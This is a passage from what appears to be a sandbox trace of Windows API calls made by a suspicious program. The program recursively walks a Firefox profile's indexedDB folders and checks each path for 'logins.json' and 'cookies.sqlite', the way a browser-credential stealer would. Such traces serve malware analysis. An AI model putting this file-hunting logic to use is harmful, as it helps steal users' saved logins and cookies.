Flags=0x8, Size=0xc4) returned 0x924a48 [0161.143] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.143] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="indexedDB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0161.143] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.143] GetProcessHeap () returned 0x8e0000 [0161.143] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.143] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 [0161.143] lstrlenW (lpString="") returned 0 [0161.143] GetProcessHeap () returned 0x8e0000 [0161.143] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc4) returned 0x924b18 [0161.144] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0161.144] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0161.144] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 [0161.144] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 [0161.144] lstrlenW (lpString="\\*.*") returned 4 [0161.144] GetProcessHeap () returned 0x8e0000 [0161.144] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xcc) returned 0x8fce90 [0161.144] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0161.144] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\*.*" [0161.144] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\*.*", lpFindFileData=0x2df538 | out: lpFindFileData=0x2df538*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6ff4f30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54, dwReserved1=0x54, cFileName=".", cAlternateFileName="")) returned 0x8f9a80 [0161.144] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.144] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df538 | out: lpFindFileData=0x2df538*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6ff4f30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54, dwReserved1=0x54, cFileName="..", cAlternateFileName="")) returned 1 [0161.144] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.144] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.144] FindNextFileW (in: hFindFile=0x8f9a80, lpFindFileData=0x2df538 | out: lpFindFileData=0x2df538*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x54, dwReserved1=0x54, cFileName="moz-safe-about+home", cAlternateFileName="MOZ-SA~1")) returned 1 [0161.144] lstrcmpiW (lpString1="moz-safe-about+home", lpString2=".") returned 1 [0161.144] lstrcmpiW (lpString1="moz-safe-about+home", lpString2="..") returned 1 [0161.144] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 [0161.144] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned 97 [0161.144] lstrlenW (lpString="\\") returned 1 [0161.144] GetProcessHeap () returned 0x8e0000 [0161.144] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xc6) returned 0x924be8 [0161.144] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB" [0161.144] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" [0161.144] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned 98 [0161.144] lstrlenW (lpString="moz-safe-about+home") returned 19 [0161.144] GetProcessHeap () returned 0x8e0000 [0161.144] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xec) returned 0x924cb8 [0161.144] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\" [0161.144] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\", lpString2="moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0161.144] VirtualQuery (in: lpAddress=0x924be8, lpBuffer=0x2df4e0, dwLength=0x1c | out: lpBuffer=0x2df4e0*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.145] GetProcessHeap () returned 0x8e0000 [0161.145] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924be8 | out: hHeap=0x8e0000) returned 1 [0161.145] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0161.145] lstrlenW (lpString="") returned 0 [0161.145] GetProcessHeap () returned 0x8e0000 [0161.145] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xec) returned 0x924db0 [0161.145] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0161.145] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0161.145] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0161.145] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0161.145] lstrlenW (lpString="\\*.*") returned 4 [0161.145] GetProcessHeap () returned 0x8e0000 [0161.145] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf4) returned 0x924ea8 [0161.145] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0161.145] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\*.*" [0161.145] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\*.*", lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9ac0 [0161.145] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.145] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.145] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.145] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.145] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".metadata", cAlternateFileName="METADA~1")) returned 1 [0161.145] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0161.145] lstrlenW (lpString="\\") returned 1 [0161.145] GetProcessHeap () returned 0x8e0000 [0161.145] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xee) returned 0x925438 [0161.145] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0161.145] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0161.145] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned 118 [0161.145] lstrlenW (lpString=".metadata") returned 9 [0161.145] GetProcessHeap () returned 0x8e0000 [0161.145] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x100) returned 0x925530 [0161.145] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0161.146] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpString2=".metadata" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata" [0161.146] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.146] GetProcessHeap () returned 0x8e0000 [0161.146] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.146] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata", lpSrch="logins.json") returned 0x0 [0161.146] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\.metadata", lpSrch="cookies.sqlite") returned 0x0 [0161.146] VirtualQuery (in: lpAddress=0x925530, lpBuffer=0x2df274, dwLength=0x1c | out: lpBuffer=0x2df274*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.146] GetProcessHeap () returned 0x8e0000 [0161.146] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925530 | out: hHeap=0x8e0000) returned 1 [0161.146] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df2c0 | out: lpFindFileData=0x2df2c0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb8110d50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb8110d50, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="idb", cAlternateFileName="")) returned 1 [0161.146] lstrcmpiW (lpString1="idb", lpString2=".") returned 1 [0161.146] lstrcmpiW (lpString1="idb", lpString2="..") returned 1 [0161.146] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0161.146] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned 117 [0161.146] lstrlenW (lpString="\\") returned 1 [0161.146] GetProcessHeap () returned 0x8e0000 [0161.146] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xee) returned 0x925438 [0161.146] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home" [0161.146] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0161.146] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned 118 [0161.146] lstrlenW (lpString="idb") returned 3 [0161.146] GetProcessHeap () returned 0x8e0000 [0161.146] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf4) returned 0x925530 [0161.146] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\" [0161.146] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\", lpString2="idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0161.146] VirtualQuery (in: lpAddress=0x925438, lpBuffer=0x2df268, dwLength=0x1c | out: lpBuffer=0x2df268*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x23000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.146] GetProcessHeap () returned 0x8e0000 [0161.146] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925438 | out: hHeap=0x8e0000) returned 1 [0161.146] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0161.146] lstrlenW (lpString="") returned 0 [0161.146] GetProcessHeap () returned 0x8e0000 [0161.146] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xf4) returned 0x925630 [0161.146] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0161.146] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpString2="" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0161.146] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0161.147] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned 121 [0161.147] lstrlenW (lpString="\\*.*") returned 4 [0161.147] GetProcessHeap () returned 0x8e0000 [0161.147] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xfc) returned 0x925730 [0161.147] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb" [0161.147] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\*.*" [0161.147] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\*.*", lpFindFileData=0x2df048 | out: lpFindFileData=0x2df048*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb701b090, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb8110d50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb8110d50, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b00 [0161.147] lstrcmpiW 